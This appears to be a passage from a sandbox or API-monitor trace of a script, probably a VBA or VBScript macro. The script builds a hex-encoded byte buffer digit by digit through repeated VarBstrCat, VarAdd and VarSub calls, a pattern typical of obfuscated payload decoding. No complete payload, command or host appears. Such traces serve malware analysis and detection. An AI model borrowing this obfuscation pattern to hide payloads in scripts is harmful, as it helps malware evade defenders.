bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.734] VarBstrCat (in: bstrLeft="&Hb", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.734] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.734] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.734] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.734] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.734] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.734] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.735] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.735] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.735] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.735] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.735] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.735] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.735] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.735] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.735] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.735] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.735] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.736] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.736] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.736] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.736] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.736] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.736] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.736] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.736] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.736] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.736] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.736] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.736] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.736] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.736] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.736] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.737] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.737] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.737] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.737] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.737] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.737] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.737] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.737] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.737] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.737] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.737] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.737] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.737] VarBstrCat (in: bstrLeft="&Hb", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.737] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.737] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.738] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.738] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.738] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.738] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.738] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.738] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.738] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.738] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.738] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.738] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.738] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.738] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.738] VarBstrCat (in: bstrLeft="&H1", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.738] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.738] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.739] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.739] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.739] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.739] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.739] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.739] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.739] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.739] VarBstrCat (in: bstrLeft="&H8", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.739] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.739] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.739] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.739] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.739] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.739] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.739] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.740] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.740] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.740] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.740] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.740] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.740] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.740] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.740] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.740] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.740] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.740] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.740] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.740] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.740] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.741] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.741] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.741] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.741] VarBstrCat (in: bstrLeft="&H0", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.741] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.741] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.741] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.741] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.741] VarBstrCat (in: bstrLeft="&H2", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.742] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.742] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.742] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.742] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.742] VarBstrCat (in: bstrLeft="&Ha", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.742] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.742] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.742] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.742] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.742] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.742] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.742] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.742] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.742] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.742] VarBstrCat (in: bstrLeft="&Ha", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.743] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.743] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.743] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.743] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.743] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.743] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.743] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.743] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.743] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.743] VarBstrCat (in: bstrLeft="&Ha", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.743] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.743] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.743] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.743] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.743] VarBstrCat (in: bstrLeft="&Ha", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.744] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.744] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.744] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.744] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.744] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.744] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.744] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.744] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.744] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.744] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.744] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.744] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0102.744] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.745] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.746] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.747] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0102.748] 